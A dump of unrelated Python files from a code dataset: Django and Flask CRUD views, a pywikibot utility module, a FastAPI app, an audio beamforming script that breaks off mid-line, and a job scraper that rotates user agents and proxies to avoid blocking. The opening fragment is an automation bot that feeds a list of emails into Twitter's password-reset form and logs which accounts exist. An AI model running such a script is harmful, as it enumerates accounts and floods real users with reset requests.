'https://twitter.com/account/verify_user_info'\n#Web_Page\nbrowser.get('https://twitter.com/account/begin_password_reset')\nwhile True :\n for line in ffile :\n mail_ = line.split(':')[0]\n #pass_ = line.split(':')[1]\n # Twitter credentials\n tw_email = str(mail_)\n # Fill credentials\n browser.find_element_by_name(\"account_identifier\").send_keys(tw_email)\n # Click.Button Search\n browser.find_element_by_xpath(\"/html/body/div[2]/div/form/input[3]\").click() #Search_button\n browser.find_element_by_xpath('/html/body/div[2]/div/form/input[2]').click() #reset button click\n \n if browser.find_element_by_xpath('/html/body/div[2]/div/form/ul/li[2]/label/input[2]') is True :\n browser.find_element_by_xpath('/html/body/div[2]/div/form/ul/li[2]/label/input[2]').click() \n \n #Chosing email input radio button\n \n elif browser.find_element('
Verify your personal information
') is True :\n print(tw_email)\n continue\n else:\n print(\"INVALID INPUT -- - - ADD MORE LINES \")\n break #BY hithmast\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"543929296","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 11:09\n# @Author : Hanxiaoshun@天谕传说\n# @Site : www.shunzi666.cn\n# @File :\n# @Version : 1.2\n# @Mail : 1425814646@qq.com\n# @Software: PyCharm 2019.2\nimport json\nimport time\nimport requests\nimport re\nimport random\nimport os\n\nfrom bs4 import BeautifulSoup\nimport math\nimport pandas as pd\nimport sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\ndate_time_str = str(time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time())))\n\n# ---------------------\njob_df = []\njobs_info = []\nuniq_company_jobs_info = []\n# requests 的简单设置\nrequests.adapters.DEFAULT_RETRIES = 5\ns = requests.session()\ns.keep_alive = False\n\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'\n\nrequests.packages.urllib3.disable_warnings()\n# 设置一些比较稳定的请求头信息,这个爬虫设置是非常重要的,\n# 一些简单的反爬虫基本上会过滤请求头,如果是requests等爬虫工具的默认请求头,则很容易被禁\n# 这样可以做到非常简单的伪装,以下是我简单搜集的请求头分享出来\nmain_user_agent = [\n 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/61.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.33 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50IE 9.0',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;IE 8.0',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)IE 7.0',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)IE 6.0',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Firefox 4.0.1 – MAC',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1Firefox 4.0.1 – Windows',\n 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1Opera 11.11 – MAC',\n 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11Opera 11.11 – Windows',\n 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11Chrome 17.0 – MAC',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11傲游(Maxthon)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)腾讯TT',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)世界之窗(The World) 2.x',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)世界之窗(The World) 3.x',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)搜狗浏览器 1.x',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)360浏览器',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)Avant',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)Green Browser',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50IE 9.0'\n]\n\n# 设置一些比较稳定的IP代理(样例)\nmain_proxies = ['https://106.56.102.22:8070',\n 'https://211.159.171.58:80', ]\n\n\nclass SpiderDomainInfo(object):\n \"\"\"\n 域名将详细文件手动转化成excel\n \"\"\"\n\n def __init__(self):\n \"\"\"\n 初始化参数信息\n \"\"\"\n self.session = requests.session()\n self.cookies = requests.cookies.RequestsCookieJar()\n self.verify_URL = \"\"\n self.img_path = \"\"\n self.origin = \"\"\n self.host = \"\"\n self.accept = \"\"\n self.referer = \"\"\n self.getUrl = \"\"\n self.portUrl = \"\"\n self.verifyCode = 0\n self.payloadData = {}\n self.user_money = 0.0 # 用户的余额\n self.total_money = 0.0 # 本次批量订购的总价\n self.set_domain = set()\n self.pages = 0\n self.uniq_company = []\n\n def load_uniq_detail_history(self):\n \"\"\"\n 加载历史数据\n :return:\n \"\"\"\n try:\n files = \"files\"\n dirs = os.listdir(\"files\")\n if dirs.__len__() > 0:\n for file in dirs:\n if \"detail\" in file:\n sub_file = os.path.join(files, file)\n with open(sub_file, 'r', encoding='utf-8') as f:\n if f.__sizeof__() > 0:\n for line in f.readlines():\n if line.__len__() > 0:\n if \"--==--==--\" in line:\n line = line[:line.index('--==--==--')]\n lines = line.split('\\t')\n if len(lines) > 0:\n company = lines[0]\n if company not in self.uniq_company:\n self.uniq_company.append(company)\n job_df.append(lines)\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n except Exception as load_uniq_detail_e:\n input(\"make_excel 发生异常:\" + str(load_uniq_detail_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":load_uniq_detail 发生异常:\" + str(load_uniq_detail_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise load_uniq_detail_e\n\n def make_excel(self):\n # print(job_df)\n try:\n page_path = 'excel'\n if os.path.exists(page_path):\n if len(os.listdir(page_path)) > 0:\n for file in os.listdir(page_path):\n os.remove(os.path.join(page_path, file))\n else:\n os.makedirs(page_path)\n\n data = pd.DataFrame(job_df)\n # 保存数据\n with pd.ExcelWriter(page_path + '/51jobs_' + date_time_str + '.xlsx') as writer: # doctest: +SKIP\n data.to_excel(writer, sheet_name='51job', index=True, header=0, na_rep='')\n except Exception as make_excel_e:\n input(\"make_excel 发生异常:\" + str(make_excel_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":make_excel 发生异常:\" + str(make_excel_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise make_excel_e\n\n def entrance(self):\n try:\n self.load_uniq_detail_history()\n self.make_excel()\n except Exception as entrance_e:\n print(\"entrance 发生异常:\" + str(entrance_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":entrance 发生异常:\" + str(entrance_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise entrance_e\n\n\nif __name__ == '__main__':\n \"\"\"\n Boss直聘采集\n 说明:\n 1、处理待检测域名\n 方法:\n \"\"\"\n # 如果域名列表文件检查成功则继续,否则不继续...\n start = time.time()\n spider = SpiderDomainInfo()\n try:\n spider.entrance()\n end = time.time()\n print('Used time-->', end - start, 's')\n except Exception as main_e:\n print(str(main_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":main 发生异常:\" + str(main_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise main_e\n input('excel 文件已生成,请按任意键退出,或直接关闭窗口.')\n","sub_path":"spider/boss_zhipin/create_excel.py","file_name":"create_excel.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"601288683","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView, DeleteView, DetailView, ListView, UpdateView\n\nfrom .models import Expense\nfrom .forms import ExpenseForm\n\nclass AddExpense(LoginRequiredMixin, CreateView):\n\tmodel = Expense\n\tform_class = ExpenseForm\n\ttemplate_name = 'expenses/add_expense.html'\n\n\nclass DeleteExpense(LoginRequiredMixin, DeleteView):\n\tmodel = Expense\n\ttemplate_name = 'bookings/confirm_delete.html'\n\tsuccess_url = reverse_lazy('expenses')\n\n\nclass EditExpense(LoginRequiredMixin, UpdateView):\n\tmodel = Expense\n\tform_class = ExpenseForm\n\ttemplate_name = 'expenses/edit_expense.html'\n\n\nclass ExpenseDetails(LoginRequiredMixin, DetailView):\n\tmodel = Expense\n\ttemplate_name = 'expenses/expense_detail.html'\n\tcontext_object_name = 'expense'\n\nclass ExpensesList(LoginRequiredMixin, ListView):\n\tmodel = Expense\n\ttemplate_name = 'expenses/expenses.html'\n\tcontext_object_name = 'expenses'\n\n","sub_path":"expenses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211994824","text":"# -*- coding: utf-8 -*-\n\nfrom flask import render_template, request, g, jsonify, abort\nfrom cerberus import Validator\nfrom bookhouse.core import app, db\nfrom bookhouse.main.misc.auth import auth_required\nfrom bookhouse.models.book import Book\nfrom bookhouse.models.user import User\nfrom bookhouse.main.misc.errors import ViewProcessJump\n\n\n@app.route('/index/', methods=['GET'])\n@app.route('/my/books/', methods=['GET'])\ndef books_page():\n return render_template('book_house.html')\n\n\n@app.route('/api/books/', methods=['GET', 'POST'])\n@auth_required\ndef books_api():\n limit_number =2\n if request.method == 'GET':\n request_data = request.args\n if request_data is None:\n raise ViewProcessJump(code='ILLEGAL_GET_REQUEST')\n before_id = int(request_data['before_id'])\n user = g.user\n if before_id == 0:\n items = Book.query.filter(db.text('user_id = :uid')).params(uid=user.id).order_by(Book.id.desc()).limit(limit_number)\n elif before_id > 0:\n items = Book.query.filter(db.text(\n 'user_id = :uid and id < :before_id'\n )).params(\n uid=user.id, before_id=before_id\n ).order_by(Book.id.desc()).limit(limit_number)\n resp_data = {\n 'status': 'success',\n 'data': {\n 'books': [{\n 'book_id': item.id,\n 'book_name': item.name,\n 'book_price': item.price,\n 'book_intro': item.intro,\n 'book_owner': user.name\n } for item in items]\n }\n }\n if len(resp_data['data']['books']) < limit_number:\n resp_data['data']['next_disable'] = True\n return jsonify(**resp_data)\n elif request.method == 'POST':\n request_data = request.json\n validator = Validator({\n 'book_name': {\n 'type': 'string',\n 'minlength': 2,\n 'maxlength': 30,\n 'required': True,\n },\n 'book_price': {\n 'required': True,\n },\n \"book_intro\": {\n 'type': 'string',\n },\n })\n if not validator.validate(request_data):\n resp_data = {\n 'status': 'fail',\n 'data': {\n 'code': 1,\n 'message': 'validate error',\n }\n }\n return jsonify(**resp_data)\n book = Book(\n name=request_data['book_name'],\n price=request_data['book_price'],\n intro=request_data['book_intro'],\n user_id=g.user.id\n )\n db.session.add(book)\n db.session.commit()\n return jsonify(**{})\n\n\n@app.route('/api/books//', methods=['GET', 'PUT', 'DELETE'])\n@auth_required\ndef book_api(book_id):\n book = Book.query.get(book_id)\n if not book:\n abort(400)\n if request.method == 'GET':\n\n resp_data = {\n 'book': {\n 'book_id': book.id,\n 'book_name': book.name,\n 'book_intro': book.intro,\n 'book_price': book.price,\n 'book_owner': User.query.get(int(book.user_id)).name\n }\n }\n return jsonify(**resp_data)\n elif request.method == 'PUT':\n request_data = request.json\n book.name = request_data['book_name']\n book.intro = request_data['book_intro']\n book.price = request_data['book_price']\n db.session.commit()\n return jsonify(**{})\n elif request.method == 'DELETE':\n db.session.delete(book)\n db.session.commit()\n return jsonify(**{})\n\n","sub_path":"bookhouse/main/views/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151623140","text":"import numpy as np\r\nimport scipy as sp\r\nimport csv\r\n\r\n\r\n## I'm implementing pandas for the first time here - so it may take a while\r\n## Using numoy arrays and wines\r\n\r\nclass Constructor:\r\n \"\"\" We analyze data in columns. Tuples are the individual data unit \"\"\"\r\n\r\n def __init__(self):\r\n self.wines = None\r\n \r\n def create_dataset():\r\n\r\n with open(\"winequality-white-small.csv\", 'r') as f:\r\n wines = list(csv.reader(f, delimiter=\";\"))\r\n ## Bug 2 -> Rounding to 2 decimal places in excel not python\r\n ## Bug 1 - for some reason - the column names are buggery\r\n import numpy as np\r\n wines = np.array(wines[1:], float)\r\n wines = wines.astype(int)\r\n ## Clean this up later - do ints for simplicity now\r\n ## third_wine = wines[3, :]\r\n ## third_wine[2] returns the 3rd wine\r\n ## wines[3] = returns a row\r\n \"\"\" At this point -> all the data is in an array \"\"\"\r\n ## wines[2,3] returns value 4th column third row\r\n ## wines[:, 3] returns column at 3\r\n self.wines = wines\r\n print(\"cat\")\r\n\r\n def number_of_cols_and_rows(self):\r\n print(self.wines[1].size())\r\n\r\n def standard_deviation():\r\n pass\r\n\r\n\r\nbase = Constructor()\r\nbase.number_of_cols_and_rows()\r\n\r\n\r\n #number_of_cols_and_rows(base)\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"V0 - Nothing implemented.py","file_name":"V0 - Nothing implemented.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"327215639","text":"import pathlib\nimport yaml\n\nBASE_DIR = pathlib.Path(__file__)\nTEMPLATES_ROOT = str(BASE_DIR.parent / 'templates')\nconfig_path = BASE_DIR.parent.parent / 'config' / 'dones.yaml'\n\ndef get_config(path):\n with open(path) as f:\n config = yaml.safe_load(f)\n return config\n\nconfig = get_config(config_path)","sub_path":"aiohttp_dones/dones/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"83351749","text":"# -*- coding: utf-8 -*-\n\"\"\"Miscellaneous helper functions (not wiki-dependent).\"\"\"\n#\n# (C) Pywikibot team, 2008\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import print_function\n__version__ = '$Id$'\n\nimport sys\nimport threading\nimport time\nfrom collections import Mapping\n\nif sys.version_info[0] > 2:\n import queue as Queue\nelse:\n import Queue\n\n\n# These variables are functions debug(str) and warning(str)\n# which are initially the builtin print function.\n# They exist here as the deprecators in this module rely only on them.\n# pywikibot updates these function variables in bot.init_handlers()\ndebug = warning = print\n\n\ndef empty_iterator():\n # http://stackoverflow.com/a/13243870/473890\n \"\"\"An iterator which does nothing.\"\"\"\n return\n yield\n\n\nclass UnicodeMixin(object):\n\n \"\"\"Mixin class to add __str__ method in Python 2 or 3.\"\"\"\n\n if sys.version_info[0] >= 3:\n def __str__(self):\n return self.__unicode__()\n else:\n def __str__(self):\n return self.__unicode__().encode('utf8')\n\n\n# From http://python3porting.com/preparing.html\nclass ComparableMixin(object):\n\n \"\"\"Mixin class to allow comparing to other objects of this class.\"\"\"\n\n def _compare(self, other, method):\n try:\n return method(self._cmpkey(), other._cmpkey())\n except (AttributeError, TypeError):\n # _cmpkey not implemented, or return different type,\n # so I can't compare with \"other\".\n return NotImplemented\n\n def __lt__(self, other):\n return self._compare(other, lambda s, o: s < o)\n\n def __le__(self, other):\n return self._compare(other, lambda s, o: s <= o)\n\n def __eq__(self, other):\n return self._compare(other, lambda s, o: s == o)\n\n def __ge__(self, other):\n return self._compare(other, lambda s, o: s >= o)\n\n def __gt__(self, other):\n return self._compare(other, lambda s, o: s > o)\n\n def __ne__(self, other):\n return self._compare(other, lambda s, o: s != o)\n\n\nclass ThreadedGenerator(threading.Thread):\n\n \"\"\"Look-ahead generator class.\n\n Runs a generator in a separate thread and queues the results; can\n be called like a regular generator.\n\n Subclasses should override self.generator, I{not} self.run\n\n Important: the generator thread will stop itself if the generator's\n internal queue is exhausted; but, if the calling program does not use\n all the generated values, it must call the generator's stop() method to\n stop the background thread. Example usage:\n\n >>> gen = ThreadedGenerator(target=xrange, args=(20,))\n >>> try:\n ... for data in gen:\n ... print data,\n ... finally:\n ... gen.stop()\n 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19\n\n \"\"\"\n\n def __init__(self, group=None, target=None, name=\"GeneratorThread\",\n args=(), kwargs=None, qsize=65536):\n \"\"\"Constructor. Takes same keyword arguments as threading.Thread.\n\n target must be a generator function (or other callable that returns\n an iterable object).\n\n @param qsize: The size of the lookahead queue. The larger the qsize,\n the more values will be computed in advance of use (which can eat\n up memory and processor time).\n @type qsize: int\n\n \"\"\"\n if kwargs is None:\n kwargs = {}\n if target:\n self.generator = target\n if not hasattr(self, \"generator\"):\n raise RuntimeError(\"No generator for ThreadedGenerator to run.\")\n self.args, self.kwargs = args, kwargs\n threading.Thread.__init__(self, group=group, name=name)\n self.queue = Queue.Queue(qsize)\n self.finished = threading.Event()\n\n def __iter__(self):\n \"\"\"Iterate results from the queue.\"\"\"\n if not self.isAlive() and not self.finished.isSet():\n self.start()\n # if there is an item in the queue, yield it, otherwise wait\n while not self.finished.isSet():\n try:\n yield self.queue.get(True, 0.25)\n except Queue.Empty:\n pass\n except KeyboardInterrupt:\n self.stop()\n\n def stop(self):\n \"\"\"Stop the background thread.\"\"\"\n self.finished.set()\n\n def run(self):\n \"\"\"Run the generator and store the results on the queue.\"\"\"\n self.__gen = self.generator(*self.args, **self.kwargs)\n for result in self.__gen:\n while True:\n if self.finished.isSet():\n return\n try:\n self.queue.put_nowait(result)\n except Queue.Full:\n time.sleep(0.25)\n continue\n break\n # wait for queue to be emptied, then kill the thread\n while not self.finished.isSet() and not self.queue.empty():\n time.sleep(0.25)\n self.stop()\n\n\ndef itergroup(iterable, size):\n \"\"\"Make an iterator that returns lists of (up to) size items from iterable.\n\n Example:\n\n >>> i = itergroup(xrange(25), 10)\n >>> print next(i)\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n >>> print next(i)\n [10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\n >>> print next(i)\n [20, 21, 22, 23, 24]\n >>> print next(i)\n Traceback (most recent call last):\n ...\n StopIteration\n\n \"\"\"\n group = []\n for item in iterable:\n group.append(item)\n if len(group) == size:\n yield group\n group = []\n if group:\n yield group\n\n\nclass ThreadList(list):\n\n \"\"\"A simple threadpool class to limit the number of simultaneous threads.\n\n Any threading.Thread object can be added to the pool using the append()\n method. If the maximum number of simultaneous threads has not been reached,\n the Thread object will be started immediately; if not, the append() call\n will block until the thread is able to start.\n\n >>> pool = ThreadList(limit=10)\n >>> def work():\n ... time.sleep(1)\n ...\n >>> for x in xrange(20):\n ... pool.append(threading.Thread(target=work))\n ...\n\n \"\"\"\n\n def __init__(self, limit=128, *args):\n self.limit = limit\n list.__init__(self, *args)\n for item in list(self):\n if not isinstance(threading.Thread, item):\n raise TypeError(\"Cannot add '%s' to ThreadList\" % type(item))\n\n def active_count(self):\n \"\"\"Return the number of alive threads, and delete all non-alive ones.\"\"\"\n count = 0\n for item in list(self):\n if item.isAlive():\n count += 1\n else:\n self.remove(item)\n return count\n\n def append(self, thd):\n if not isinstance(thd, threading.Thread):\n raise TypeError(\"Cannot append '%s' to ThreadList\" % type(thd))\n while self.active_count() >= self.limit:\n time.sleep(2)\n list.append(self, thd)\n thd.start()\n\n\nclass CombinedError(KeyError, IndexError):\n\n \"\"\"An error that gets caught by both KeyError and IndexError.\"\"\"\n\n\nclass EmptyDefault(str, Mapping):\n\n \"\"\"\n A default for a not existing siteinfo property.\n\n It should be chosen if there is no better default known. It acts like an\n empty collections, so it can be iterated through it savely if treated as a\n list, tuple, set or dictionary. It is also basically an empty string.\n\n Accessing a value via __getitem__ will result in an combined KeyError and\n IndexError.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialise the default as an empty string.\"\"\"\n str.__init__(self)\n\n def _empty_iter(self):\n \"\"\"An iterator which does nothing and drops the argument.\"\"\"\n return empty_iterator()\n\n def __getitem__(self, key):\n \"\"\"Raise always a L{CombinedError}.\"\"\"\n raise CombinedError(key)\n\n iteritems = itervalues = iterkeys = __iter__ = _empty_iter\n\n\nEMPTY_DEFAULT = EmptyDefault()\n\n\ndef deprecated(instead=None):\n \"\"\"Decorator to output a method deprecation warning.\n\n @param instead: if provided, will be used to specify the replacement\n @type instead: string\n \"\"\"\n def decorator(method):\n def wrapper(*args, **kwargs):\n funcname = method.__name__\n classname = args[0].__class__.__name__\n if instead:\n warning(u\"%s.%s is DEPRECATED, use %s instead.\"\n % (classname, funcname, instead))\n else:\n warning(u\"%s.%s is DEPRECATED.\" % (classname, funcname))\n return method(*args, **kwargs)\n wrapper.__name__ = method.__name__\n return wrapper\n return decorator\n\n\ndef deprecate_arg(old_arg, new_arg):\n \"\"\"Decorator to declare old_arg deprecated and replace it with new_arg.\"\"\"\n _logger = \"\"\n\n def decorator(method):\n def wrapper(*__args, **__kw):\n meth_name = method.__name__\n if old_arg in __kw:\n if new_arg:\n if new_arg in __kw:\n warning(\nu\"%(new_arg)s argument of %(meth_name)s replaces %(old_arg)s; cannot use both.\"\n % locals())\n else:\n warning(\nu\"%(old_arg)s argument of %(meth_name)s is deprecated; use %(new_arg)s instead.\"\n % locals())\n __kw[new_arg] = __kw[old_arg]\n else:\n debug(\nu\"%(old_arg)s argument of %(meth_name)s is deprecated.\"\n % locals(), _logger)\n del __kw[old_arg]\n return method(*__args, **__kw)\n wrapper.__doc__ = method.__doc__\n wrapper.__name__ = method.__name__\n return wrapper\n return decorator\n\n\ndef redirect_func(target, source_module=None, target_module=None):\n \"\"\"\n Return a function which can be used to redirect to 'target'.\n\n It also acts like marking that function deprecated and copies all\n parameters.\n\n @param target: The targeted function which is to be executed.\n @type target: callable\n @param source_module: The module of the old function. If '.' defaults\n to target_module. If 'None' (default) it tries to guess it from the\n executing function.\n @type source_module: basestring\n @param target_module: The module of the target function. If\n 'None' (default) it tries to get it from the target. Might not work\n with nested classes.\n @type target_module: basestring\n @return: A new function which adds a warning prior to each execution.\n @rtype: callable\n \"\"\"\n class Wrapper(object):\n def __init__(self, function, source, target):\n self._function = function\n self.parameters = {'new': function.__name__,\n 'target': target,\n 'source': source}\n self.warning = ('{source}{new} is DEPRECATED, use {target}{new} '\n 'instead.').format(**self.parameters)\n\n def call(self, *a, **kw):\n warning(self.warning)\n return self._function(*a, **kw)\n\n if target_module is None:\n target_module = target.__module__\n if hasattr(target, '__self__'):\n target_module += '.' + target.__self__.__class__.__name__\n if target_module and target_module[-1] != '.':\n target_module += '.'\n if source_module is '.':\n source_module = target_module\n elif source_module and source_module[-1] != '.':\n source_module += '.'\n else:\n source_module = (sys._getframe(1).f_code.co_filename.rsplit(\"/\", 1)[0]\n .replace(\"/\", \".\") + \".\")\n return Wrapper(target, source_module, target_module).call\n\n\nif __name__ == \"__main__\":\n def _test():\n import doctest\n doctest.testmod()\n _test()\n","sub_path":"pywikibot/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":11884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"16068617","text":"# backend/main.py\n\nfrom typing import Optional\n\nimport uvicorn\nfrom fastapi import FastAPI\n\nfrom api import notes, inference, upload\nfrom database.db import engine, metadata, database\n\nmetadata.create_all(engine)\n\n\ndef create_application() -> FastAPI:\n application = FastAPI()\n application.include_router(inference.router, prefix='/transfer', tags=[\"styles\"])\n application.include_router(upload.router, prefix='/upload', tags=[\"upload\"])\n application.include_router(notes.router, prefix=\"/notes\", tags=[\"notes\"])\n return application\n\n\napp = create_application()\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"message\": \"Welcome from the API\"}\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8080)\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218783130","text":"'''\nGoogle Speech Commands Dataset\n=================\n\nPyroomacoustics includes a wrapper around the Google Speech Commands dataset [TODO add reference].\n'''\n\nimport sys\nimport numpy as np\nimport os.path\nsys.path.append(\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nimport pyroomacoustics as pra\nimport os, argparse\n# import pyroomacoustics.datasets.utils as utils\nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile \n\n# import tf and functions for labelling\nimport tensorflow as tf\n\nfrom tensorflow.contrib.framework.python.ops import audio_ops as contrib_audio\n\ndef load_graph(f):\n with tf.gfile.FastGFile(f,'rb') as graph:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(graph.read())\n tf.import_graph_def(graph_def, name='')\n\n\ndef load_labels(f):\n return [line.rstrip() for line in tf.gfile.GFile(f)]\n\n\ndef run_graph(wav_data, labels, index, how_many_labels=3, verbose=False):\n with tf.Session() as session:\n softmax_tensor = session.graph.get_tensor_by_name(\"labels_softmax:0\")\n predictions, = session.run(softmax_tensor,{\"wav_data:0\": wav_data})\n\n top_k = predictions.argsort()[-how_many_labels:][::-1]\n for node_id in top_k:\n human_string = labels[node_id]\n score = predictions[node_id]\n if verbose:\n print('%s (score = %.5f)' % (human_string, score))\n return predictions[index]\n\n\n\ndef label_wav(wav,labels,graph,word):\n \"\"\"\n Requires WAV file to be coded as int16\n \"\"\"\n\n if not wav or not tf.gfile.Exists(wav):\n tf.logging.fatal('Audio file does not exist %s',wav)\n if not labels or not tf.gfile.Exists(labels):\n tf.logging.fatal('Labels file does not exist %s', labels)\n if not graph or not tf.gfile.Exists(graph):\n tf.logging.fatal('Graph file does not exist %s', graph)\n\n labels_list = load_labels(labels)\n load_graph(graph)\n\n with open(wav,'rb') as wav_file:\n wav_data = wav_file.read()\n index = labels_list.index(word)\n return run_graph(wav_data,labels_list,index)\n\n\nif __name__ == '__main__':\n\n dest_dir = \"bf_output\"\n labels_file = \"conv_labels.txt\"\n graph_file = \"my_frozen_graph.pb\"\n max_order = 3\n absorption_fact = 0.2\n room_dim = [4,6]\n snr_vals = np.arange(20,-30,-5)\n desired_word = 'yes'\n pos_source = [1,4.5]\n pos_noise = [2.8,4.3]\n fft_len = 1024\n\n # use circular array with center mic\n center = np.array([2,1.5])\n radius = 0.2\n R = pra.circular_2D_array(center, M=6, phi0=0, radius=radius)\n R = np.concatenate((R, np.array(center, ndmin=2).T), axis=1)\n\n # visualize the setup\n room = pra.ShoeBox(room_dim, absorption=absorption_fact, max_order=max_order)\n room.add_source(pos_source)\n room.add_source(pos_noise)\n room.add_microphone_array(pra.Beamformer(R, room.fs, N=fft_len))\n room.mic_array.rake_delay_and_sum_weights(room.sources[0][:1])\n room.plot(freq=[500, 1000, 2000, 4000], img_order=0)\n plt.title(\"Simulation setup and polar patterns\")\n plt.legend(['500', '1000', '2000', '4000'])\n plt.grid()\n\n #create object\n dataset = pra.datasets.GoogleSpeechCommands(download=True,subset=1)\n\n #separate the noise and the speech samples\n noise_samps = dataset.filter(speech=0)\n speech_samps = dataset.filter(speech=1)\n speech_samps = speech_samps.filter(word=desired_word)\n\n #pick one of each from WAV\n speech_samp = speech_samps[0]\n noise_samp = noise_samps[0]\n print()\n print(\"SPEECH FILE INFO :\")\n print(speech_samp)\n print(\"NOISE FILE INFO :\")\n print(noise_samp)\n print()\n\n #creating a noisy_signal array for each snr value\n speech_file_location = speech_samp.meta.file_loc\n noise_file_location = noise_samp.meta.file_loc\n\n \"\"\"\n Beamform original signal.\n \n First the room with only the signal.\n \"\"\"\n fs_s, speech = wavfile.read(speech_file_location)\n input_type = speech.dtype\n try:\n IN_MAX_VAL = max(np.iinfo(input_type).max, abs(np.iinfo(input_type).min))\n except:\n IN_MAX_VAL = 